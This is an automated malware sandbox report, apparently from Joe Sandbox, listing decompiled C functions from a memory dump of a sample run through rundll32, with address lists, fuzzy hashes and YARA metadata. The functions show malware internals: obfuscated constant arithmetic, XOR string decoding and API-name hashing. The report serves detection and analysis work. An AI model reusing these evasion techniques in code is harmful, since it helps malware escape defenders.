					 *((char*)(_t63 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
				}
				return _t63;
			}



















                                                                                                                                    0x002d860c
                                                                                                                                    0x002d8610
                                                                                                                                    0x002d8614
                                                                                                                                    0x002d8618
                                                                                                                                    0x002d861a
                                                                                                                                    0x002d861f
                                                                                                                                    0x002d8627
                                                                                                                                    0x002d862a
                                                                                                                                    0x002d8632
                                                                                                                                    0x002d8637
                                                                                                                                    0x002d863f
                                                                                                                                    0x002d8647
                                                                                                                                    0x002d864f
                                                                                                                                    0x002d8659
                                                                                                                                    0x002d865d
                                                                                                                                    0x002d8665
                                                                                                                                    0x002d866d
                                                                                                                                    0x002d8675
                                                                                                                                    0x002d867a
                                                                                                                                    0x002d8682
                                                                                                                                    0x002d8686
                                                                                                                                    0x002d8689
                                                                                                                                    0x002d868b
                                                                                                                                    0x002d868f
                                                                                                                                    0x002d8693
                                                                                                                                    0x002d86a3
                                                                                                                                    0x002d86ae
                                                                                                                                    0x002d86bc
                                                                                                                                    0x002d86be
                                                                                                                                    0x002d86c6
                                                                                                                                    0x002d86ce
                                                                                                                                    0x002d86d0
                                                                                                                                    0x002d86e1
                                                                                                                                    0x002d86e6
                                                                                                                                    0x002d86e8
                                                                                                                                    0x002d86ec
                                                                                                                                    0x002d86ec
                                                                                                                                    0x002d86ee
                                                                                                                                    0x002d86f1
                                                                                                                                    0x002d86f3
                                                                                                                                    0x002d86fa
                                                                                                                                    0x002d86fd
                                                                                                                                    0x002d8700
                                                                                                                                    0x002d8703
                                                                                                                                    0x002d8709
                                                                                                                                    0x002d870a
                                                                                                                                    0x002d870d
                                                                                                                                    0x002d8711
                                                                                                                                    0x002d8711
                                                                                                                                    0x002d871a
                                                                                                                                    0x002d871a
                                                                                                                                    0x002d8726

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: &#
                                                                                                                                    • API String ID: 0-2240308938
                                                                                                                                    • Opcode ID: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                                    • Instruction ID: 6d34377f5ba4d4d1e52c472f79cf6d7286ac3e431c82542b8fcce94ffafc4168
                                                                                                                                    • Opcode Fuzzy Hash: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                                    • Instruction Fuzzy Hash: 4B3159726183518FC305DF28C88581BFBE0FF98718F054B6DE88AA7211D774EA19CB96
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002DDCF7 Relevance: 1.3, Strings: 1, Instructions: 90COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E002DDCF7(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t39;
				signed int _t43;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t70;
				unsigned int _t71;
				unsigned int _t72;
				signed int _t76;
				signed int* _t77;
				signed int* _t78;
				unsigned int _t80;
				void* _t86;
				short _t88;
				void* _t90;
				void* _t91;

				_push( *(_t90 + 0x28));
				_push( *(_t90 + 0x28));
				_push(__edx);
				E002D20B9(_t39);
				 *(_t90 + 0x24) = 0xf19f37;
				_t77 =  &(__edx[1]);
				 *(_t90 + 0x24) =  *(_t90 + 0x24) * 0x42;
				 *(_t90 + 0x24) =  *(_t90 + 0x24) ^ 0x3e4cf98f;
				 *(_t90 + 0x20) = 0xb1a340;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) + 0xbcd0;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) ^ 0x00b2d2cb;
				 *(_t90 + 0x1c) = 0x9743e1;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) | 0x457c67e3;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) ^ 0x45f711d7;
				_t63 =  *__edx;
				_t78 =  &(_t77[1]);
				_t43 =  *_t77 ^ _t63;
				 *(_t90 + 0x28) = _t63;
				 *(_t90 + 0x2c) = _t43;
				_t21 = _t43 + 1; // 0xf19f38
				_t80 =  !=  ? (_t21 & 0xfffffffc) + 4 : _t21;
				_t91 = _t90 + 8;
				_t60 = E002C7FF2(_t80 + _t80);
				 *(_t91 + 0x1c) = _t60;
				if(_t60 != 0) {
					_t88 = 0;
					_t76 = _t60;
					_t86 =  >  ? 0 :  &(_t78[_t80 >> 2]) - _t78 + 3 >> 2;
					if(_t86 != 0) {
						_t61 =  *(_t91 + 0x1c);
						do {
							_t70 =  *_t78;
							_t78 =  &(_t78[1]);
							_t71 = _t70 ^ _t61;
							 *_t76 = _t71 & 0x000000ff;
							_t76 = _t76 + 8;
							 *((short*)(_t76 - 6)) = _t71 >> 0x00000008 & 0x000000ff;
							_t72 = _t71 >> 0x10;
							_t88 = _t88 + 1;
							 *((short*)(_t76 - 4)) = _t72 & 0x000000ff;
							 *((short*)(_t76 - 2)) = _t72 >> 0x00000008 & 0x000000ff;
						} while (_t88 < _t86);
						_t60 =  *(_t91 + 0x18);
					}
					 *((short*)(_t60 +  *(_t91 + 0x20) * 2)) = 0;
				}
				return _t60;
			}



















                                                                                                                                    0x002ddcfd
                                                                                                                                    0x002ddd01
                                                                                                                                    0x002ddd05
                                                                                                                                    0x002ddd07
                                                                                                                                    0x002ddd0c
                                                                                                                                    0x002ddd14
                                                                                                                                    0x002ddd1c
                                                                                                                                    0x002ddd20
                                                                                                                                    0x002ddd28
                                                                                                                                    0x002ddd30
                                                                                                                                    0x002ddd38
                                                                                                                                    0x002ddd40
                                                                                                                                    0x002ddd48
                                                                                                                                    0x002ddd50
                                                                                                                                    0x002ddd58
                                                                                                                                    0x002ddd5c
                                                                                                                                    0x002ddd5f
                                                                                                                                    0x002ddd61
                                                                                                                                    0x002ddd65
                                                                                                                                    0x002ddd69
                                                                                                                                    0x002ddd79
                                                                                                                                    0x002ddd84
                                                                                                                                    0x002ddd93
                                                                                                                                    0x002ddd95
                                                                                                                                    0x002ddd9d
                                                                                                                                    0x002ddda5
                                                                                                                                    0x002ddda7
                                                                                                                                    0x002dddb8
                                                                                                                                    0x002dddbd
                                                                                                                                    0x002dddbf
                                                                                                                                    0x002dddc3
                                                                                                                                    0x002dddc3
                                                                                                                                    0x002dddc5
                                                                                                                                    0x002dddc8
                                                                                                                                    0x002dddcd
                                                                                                                                    0x002dddd5
                                                                                                                                    0x002ddddb
                                                                                                                                    0x002ddddf
                                                                                                                                    0x002ddde8
                                                                                                                                    0x002ddde9
                                                                                                                                    0x002dddf0
                                                                                                                                    0x002dddf4
                                                                                                                                    0x002dddf8
                                                                                                                                    0x002dddf8
                                                                                                                                    0x002dde03
                                                                                                                                    0x002dde03
                                                                                                                                    0x002dde0f

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: g|E
                                                                                                                                    • API String ID: 0-3824901942
                                                                                                                                    • Opcode ID: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                                    • Instruction ID: 771f85cc3f89416af91f0a49c8da626feb65c70741d36fa50a5159dcf3850d88
                                                                                                                                    • Opcode Fuzzy Hash: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                                    • Instruction Fuzzy Hash: 5131AE766183128FC714DF29C48146AF7E0FF98318F414B6EE889AB251D774EA09CF96
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C51BB Relevance: 1.3, Strings: 1, Instructions: 81COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E002C51BB() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t72;
				intOrPtr _t83;
				signed int _t87;
				signed int _t88;
				signed int _t89;

				_v28 = _v28 & 0x00000000;
				_v32 = 0x54cf7d;
				_v16 = 0x3835ff;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 * 0x17;
				_v16 = _v16 ^ 0x00095bb8;
				_t72 = 0xe98fb1d;
				_v24 = 0x583681;
				_t87 = 0x44;
				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000eb9f7;
				_v12 = 0x832b1f;
				_v12 = _v12 << 5;
				_v12 = _v12 | 0x242a8544;
				_v12 = _v12 ^ 0x346a2866;
				_v8 = 0x6a77bb;
				_v8 = _v8 >> 0xe;
				_t88 = 0x19;
				_v8 = _v8 / _t88;
				_v8 = _v8 ^ 0x9d9369f0;
				_v8 = _v8 ^ 0x9d908f3a;
				_v20 = 0x4802c8;
				_t89 = 0x21;
				_v20 = _v20 / _t89;
				_v20 = _v20 + 0xffffbfc3;
				_v20 = _v20 ^ 0x000df493;
				do {
					while(_t72 != 0x9835b86) {
						if(_t72 == 0xe98fb1d) {
							_push(_t72);
							_push(_t72);
							 *0x2e3e04 = E002C7FF2(0x134);
							_t72 = 0x9835b86;
							continue;
						}
						goto L5;
					}
					_t83 =  *0x2e3e04; // 0x0
					E002D0001(_v8, _t83 + 0x18, _v20);
					_t72 = 0x7dce4e4;
					L5:
				} while (_t72 != 0x7dce4e4);
				return 1;
			}















                                                                                                                                    0x002c51c1
                                                                                                                                    0x002c51c7
                                                                                                                                    0x002c51ce
                                                                                                                                    0x002c51d5
                                                                                                                                    0x002c51e2
                                                                                                                                    0x002c51ea
                                                                                                                                    0x002c51f1
                                                                                                                                    0x002c51f3
                                                                                                                                    0x002c5202
                                                                                                                                    0x002c5207
                                                                                                                                    0x002c520c
                                                                                                                                    0x002c5213
                                                                                                                                    0x002c521a
                                                                                                                                    0x002c521e
                                                                                                                                    0x002c5225
                                                                                                                                    0x002c522c
                                                                                                                                    0x002c5233
                                                                                                                                    0x002c523a
                                                                                                                                    0x002c523f
                                                                                                                                    0x002c5244
                                                                                                                                    0x002c524b
                                                                                                                                    0x002c5252
                                                                                                                                    0x002c525c
                                                                                                                                    0x002c5264
                                                                                                                                    0x002c5267
                                                                                                                                    0x002c526e
                                                                                                                                    0x002c5275
                                                                                                                                    0x002c5275
                                                                                                                                    0x002c527b
                                                                                                                                    0x002c528b
                                                                                                                                    0x002c528c
                                                                                                                                    0x002c5294
                                                                                                                                    0x002c5299
                                                                                                                                    0x00000000
                                                                                                                                    0x002c5299
                                                                                                                                    0x00000000
                                                                                                                                    0x002c527b
                                                                                                                                    0x002c52a0
                                                                                                                                    0x002c52ac
                                                                                                                                    0x002c52b2
                                                                                                                                    0x002c52b4
                                                                                                                                    0x002c52b4
                                                                                                                                    0x002c52c1

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: f(j4
                                                                                                                                    • API String ID: 0-3086030595
                                                                                                                                    • Opcode ID: 7c17a3ba5dcbd69e9c406eb4b360d410cc18587a8dd1b1f2830e0810b2b2ac2d
                                                                                                                                    • Instruction ID: b0cdc2685e909374d52179867546c0a7e5906f1cd00e7bde3b82a23e321cb8d9
                                                                                                                                    • Opcode Fuzzy Hash: 7c17a3ba5dcbd69e9c406eb4b360d410cc18587a8dd1b1f2830e0810b2b2ac2d
                                                                                                                                    • Instruction Fuzzy Hash: CA316871E11219ABCF08DFAAD9899EEBBB1FB44324F20819DE405AB250D3B45E55CF81
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C2051 Relevance: 1.3, Strings: 1, Instructions: 80COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002C2051(void* __edx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t71;
				signed int _t78;
				signed int _t80;
				signed int _t83;
				signed int _t92;
				signed int _t95;
				signed short* _t97;

				_push(_a8);
				_t97 = _a4;
				_push(_t97);
				E002D20B9(_t71);
				_v16 = 0x71ca23;
				_v12 = 0x57f692;
				_v8 = 0;
				_v4 = 0;
				_v20 = 0xd3252c;
				_v20 = _v20 + 0x4351;
				_v20 = _v20 + 0xffff5b79;
				_v20 = _v20 ^ 0x00d2c3f6;
				_a4 = 0xbb067e;
				_t83 = 0x11;
				_a4 = _a4 / _t83;
				_a4 = _a4 >> 8;
				_a4 = _a4 ^ 0xac5d3832;
				_a4 = _a4 ^ 0xac5d3334;
				_a4 = 0xab60c2;
				_a4 = _a4 << 0x10;
				_a4 = _a4 ^ 0x910d5570;
				_a4 = _a4 >> 4;
				_a4 = _a4 ^ 0x0f1cf547;
				if( *_t97 != 0) {
					do {
						_t80 = _v20;
						_a4 = 0xbb067e;
						_a4 = _a4 / _t83;
						_a4 = _a4 >> 8;
						_a4 = _a4 ^ 0xac5d3832;
						_a4 = _a4 ^ 0xac5d3334;
						_a4 = 0xab60c2;
						_a4 = _a4 << 0x10;
						_a4 = _a4 ^ 0x910d5570;
						_a4 = _a4 >> 4;
						_a4 = _a4 ^ 0x0f1cf547;
						_t92 = _v20 << _a4;
						_t78 =  *_t97 & 0x0000ffff;
						_t95 = _v20 << _a4;
						if(_t78 >= 0x41 && _t78 <= 0x5a) {
							_t78 = _t78 + 0x20;
						}
						_v20 = _t78;
						_t97 =  &(_t97[1]);
						_v20 = _v20 + _t92;
						_v20 = _v20 + _t95;
						_v20 = _v20 - _t80;
						_t83 = 0x11;
					} while ( *_t97 != 0);
				}
				return _v20;
			}















                                                                                                                                    0x002c2056
                                                                                                                                    0x002c205a
                                                                                                                                    0x002c205e
                                                                                                                                    0x002c2061
                                                                                                                                    0x002c2066
                                                                                                                                    0x002c2070
                                                                                                                                    0x002c207b
                                                                                                                                    0x002c2081
                                                                                                                                    0x002c2085
                                                                                                                                    0x002c208d
                                                                                                                                    0x002c2095
                                                                                                                                    0x002c209d
                                                                                                                                    0x002c20a5
                                                                                                                                    0x002c20b3
                                                                                                                                    0x002c20b6
                                                                                                                                    0x002c20ba
                                                                                                                                    0x002c20bf
                                                                                                                                    0x002c20c7
                                                                                                                                    0x002c20cf
                                                                                                                                    0x002c20d7
                                                                                                                                    0x002c20dc
                                                                                                                                    0x002c20e4
                                                                                                                                    0x002c20e9
                                                                                                                                    0x002c20f4
                                                                                                                                    0x002c20fc
                                                                                                                                    0x002c20fc
                                                                                                                                    0x002c2102
                                                                                                                                    0x002c2110
                                                                                                                                    0x002c2114
                                                                                                                                    0x002c2119
                                                                                                                                    0x002c2121
                                                                                                                                    0x002c2131
                                                                                                                                    0x002c2139
                                                                                                                                    0x002c213e
                                                                                                                                    0x002c2146
                                                                                                                                    0x002c214b
                                                                                                                                    0x002c2153
                                                                                                                                    0x002c215d
                                                                                                                                    0x002c2160
                                                                                                                                    0x002c2165
                                                                                                                                    0x002c216c
                                                                                                                                    0x002c216c
                                                                                                                                    0x002c216f
                                                                                                                                    0x002c2173
                                                                                                                                    0x002c2176
                                                                                                                                    0x002c217a
                                                                                                                                    0x002c217e
                                                                                                                                    0x002c2184
                                                                                                                                    0x002c2185
                                                                                                                                    0x002c218f
                                                                                                                                    0x002c2199

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: QC
                                                                                                                                    • API String ID: 0-229404352
                                                                                                                                    • Opcode ID: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                                    • Instruction ID: 04036478e34abf4cca234606d5f48e9d8532877727d51073550d1ceda53c227a
                                                                                                                                    • Opcode Fuzzy Hash: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                                    • Instruction Fuzzy Hash: 8C3135718183818BD315DF29C48941BBBE0FFD87A8F548E1DF4C9A2225D7B5C688CB56
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D176B Relevance: 1.3, Strings: 1, Instructions: 75COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E002D176B(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t87;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t102;
				signed int _t103;

				_v36 = _v36 & 0x00000000;
				_v40 = 0x355323;
				_v24 = 0x6eb9b5;
				_v24 = _v24 + 0x6c21;
				_t102 = __ecx;
				_t91 = 0x64;
				_v24 = _v24 / _t91;
				_v24 = _v24 ^ 0x0005c519;
				_v32 = 0xba69a0;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x5d3c95d0;
				_v20 = 0x99612d;
				_v20 = _v20 | 0x6bf7bfaf;
				_v20 = _v20 + 0x66ac;
				_v20 = _v20 ^ 0x6c036c89;
				_v16 = 0xd72900;
				_v16 = _v16 + 0xffff2462;
				_v16 = _v16 ^ 0xa7b97bfd;
				_v16 = _v16 + 0xffff7578;
				_v16 = _v16 ^ 0xa76084ba;
				_v12 = 0xeb6610;
				_t92 = 0x6f;
				_v12 = _v12 / _t92;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0x2e835447;
				_v12 = _v12 ^ 0x21f4cf0c;
				_v28 = 0x644f8d;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xa;
				_v28 = _v28 ^ 0x89f1a004;
				_v8 = 0xbb77ef;
				_t93 = 0x72;
				_v8 = _v8 * 0x3c;
				_v8 = _v8 / _t93;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x18aaba50;
				_t87 = E002D0AE0(_v8, _v28);
				_push(_v12);
				_t103 = _t87;
				_push(_t102);
				_push(_t103);
				_push(3);
				E002C80E3(_v20, _v16);
				 *((short*)(_t102 + _t103 * 2)) = 0;
				return 0;
			}


















                                                                                                                                    0x002d1771
                                                                                                                                    0x002d1777
                                                                                                                                    0x002d177e
                                                                                                                                    0x002d1785
                                                                                                                                    0x002d1793
                                                                                                                                    0x002d1795
                                                                                                                                    0x002d179a
                                                                                                                                    0x002d179f
                                                                                                                                    0x002d17a6
                                                                                                                                    0x002d17ad
                                                                                                                                    0x002d17b1
                                                                                                                                    0x002d17b8
                                                                                                                                    0x002d17bf
                                                                                                                                    0x002d17c6
                                                                                                                                    0x002d17cd
                                                                                                                                    0x002d17d4
                                                                                                                                    0x002d17db
                                                                                                                                    0x002d17e2
                                                                                                                                    0x002d17e9
                                                                                                                                    0x002d17f0
                                                                                                                                    0x002d17f7
                                                                                                                                    0x002d1801
                                                                                                                                    0x002d1806
                                                                                                                                    0x002d180b
                                                                                                                                    0x002d180f
                                                                                                                                    0x002d1816
                                                                                                                                    0x002d181d
                                                                                                                                    0x002d1824
                                                                                                                                    0x002d1828
                                                                                                                                    0x002d182c
                                                                                                                                    0x002d1833
                                                                                                                                    0x002d183e
                                                                                                                                    0x002d183f
                                                                                                                                    0x002d1847
                                                                                                                                    0x002d184a
                                                                                                                                    0x002d184e
                                                                                                                                    0x002d1861
                                                                                                                                    0x002d1866
                                                                                                                                    0x002d186c
                                                                                                                                    0x002d1871
                                                                                                                                    0x002d1872
                                                                                                                                    0x002d1873
                                                                                                                                    0x002d1875
                                                                                                                                    0x002d187f
                                                                                                                                    0x002d1888

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: #S5
                                                                                                                                    • API String ID: 0-40889119
                                                                                                                                    • Opcode ID: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                                    • Instruction ID: 9bbb3538ccd6b10bb6af1dd2521eebecb7202ecd5cffe1e84d3eeb227820cc93
                                                                                                                                    • Opcode Fuzzy Hash: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                                    • Instruction Fuzzy Hash: 543132B2D0020AEBCB48DFE5C94AAEEBBB1FB44304F20809AD515B6260D7B50B15CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002E09B5 Relevance: 1.3, Strings: 1, Instructions: 71COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002E09B5(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _t77;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v32 = 4;
				_v52 = 0xab6069;
				_v48 = 0xcf1f96;
				_v44 = 0x29044d;
				_v24 = 0xea6416;
				_v24 = _v24 | 0x7adbff7d;
				_v24 = _v24 ^ 0x5afbff7f;
				_v16 = 0x725236;
				_v16 = _v16 + 0xffff3c91;
				_v16 = _v16 << 7;
				_t88 = 0x2b;
				_v16 = _v16 / _t88;
				_v16 = _v16 ^ 0x015653a2;
				_v12 = 0xbf3984;
				_v12 = _v12 ^ 0x457d3893;
				_t89 = 0x44;
				_v12 = _v12 / _t89;
				_v12 = _v12 + 0x25bc;
				_v12 = _v12 ^ 0x0106bc10;
				_v20 = 0xd655eb;
				_v20 = _v20 | 0x2344b0aa;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x147fb4df;
				_v8 = 0x70d8dc;
				_v8 = _v8 + 0xe534;
				_v8 = _v8 ^ 0xb5155b0d;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x01640b3f;
				_v28 = 0x2d9f47;
				_v28 = _v28 + 0xffffba71;
				_v28 = _v28 ^ 0x002c2593;
				_t77 = E002C94EE(_v16, __ecx, _v24 | __edx, __ecx,  &_v36, _v20, _v8,  &_v32, _v28);
				asm("sbb eax, eax");
				return  ~_t77 & _v36;
			}


















                                                                                                                                    0x002e09bb
                                                                                                                                    0x002e09bf
                                                                                                                                    0x002e09c6
                                                                                                                                    0x002e09cd
                                                                                                                                    0x002e09d4
                                                                                                                                    0x002e09db
                                                                                                                                    0x002e09e2
                                                                                                                                    0x002e09e9
                                                                                                                                    0x002e09f0
                                                                                                                                    0x002e09f7
                                                                                                                                    0x002e09fe
                                                                                                                                    0x002e0a09
                                                                                                                                    0x002e0a12
                                                                                                                                    0x002e0a17
                                                                                                                                    0x002e0a1e
                                                                                                                                    0x002e0a25
                                                                                                                                    0x002e0a2f
                                                                                                                                    0x002e0a32
                                                                                                                                    0x002e0a35
                                                                                                                                    0x002e0a3c
                                                                                                                                    0x002e0a43
                                                                                                                                    0x002e0a4a
                                                                                                                                    0x002e0a55
                                                                                                                                    0x002e0a5b
                                                                                                                                    0x002e0a62
                                                                                                                                    0x002e0a69
                                                                                                                                    0x002e0a70
                                                                                                                                    0x002e0a77
                                                                                                                                    0x002e0a7b
                                                                                                                                    0x002e0a82
                                                                                                                                    0x002e0a89
                                                                                                                                    0x002e0a90
                                                                                                                                    0x002e0ab3
                                                                                                                                    0x002e0abd
                                                                                                                                    0x002e0ac7

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 6Rr
                                                                                                                                    • API String ID: 0-3911282678
                                                                                                                                    • Opcode ID: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                                    • Instruction ID: 67d836abe34168bbfc386bffb2098744975d1a1244164c2b237446fd3825ecf5
                                                                                                                                    • Opcode Fuzzy Hash: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                                    • Instruction Fuzzy Hash: 9731E1B1D1021EEBDB04CFA5C94A9EEFBB5FB44318F108699D121B6250D3B85B59CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D8519 Relevance: 1.3, Strings: 1, Instructions: 49COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E002D8519(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t55;

				_push(_a4);
				_push(__ecx);
				E002D20B9(_t55);
				_v8 = 0x519131;
				_v8 = _v8 ^ 0xec4619ea;
				_v8 = _v8 + 0x48c3;
				_v8 = _v8 ^ 0x9760daa2;
				_v8 = _v8 ^ 0x7b7f7884;
				_v16 = 0xb689a0;
				_v16 = _v16 + 0x133d;
				_v16 = _v16 ^ 0x00b72bb6;
				_v12 = 0xec38eb;
				_v12 = _v12 * 0x68;
				_v12 = _v12 | 0x70f3e2c1;
				_v12 = _v12 + 0xd290;
				_v12 = _v12 ^ 0x7ff36ca2;
				_v12 = 0x452aa4;
				_v12 = _v12 ^ 0xbb670255;
				_v12 = _v12 >> 1;
				_v12 = _v12 * 0x2d;
				_v12 = _v12 ^ 0x7280165f;
				_v24 = 0xb68a33;
				_v24 = _v24 + 0xffff2941;
				_v24 = _v24 ^ 0x00b92c3b;
				_v12 = 0x340add;
				_v12 = _v12 | 0xd5e1d7f7;
				_v12 = _v12 ^ 0xd5f6168b;
				_v20 = 0x853d17;
				_v20 = _v20 + 0xcd4d;
				_v20 = _v20 ^ 0x00837917;
				return E002CA30C(_v12, _a4, E002C1DB9(__ecx), _v20);
			}









                                                                                                                                    0x002d851f
                                                                                                                                    0x002d8523
                                                                                                                                    0x002d8524
                                                                                                                                    0x002d8529
                                                                                                                                    0x002d8530
                                                                                                                                    0x002d8537
                                                                                                                                    0x002d853e
                                                                                                                                    0x002d8545
                                                                                                                                    0x002d854c
                                                                                                                                    0x002d8553
                                                                                                                                    0x002d855a
                                                                                                                                    0x002d8561
                                                                                                                                    0x002d856c
                                                                                                                                    0x002d856f
                                                                                                                                    0x002d8576
                                                                                                                                    0x002d857d
                                                                                                                                    0x002d8584
                                                                                                                                    0x002d858b
                                                                                                                                    0x002d8592
                                                                                                                                    0x002d8599
                                                                                                                                    0x002d859c
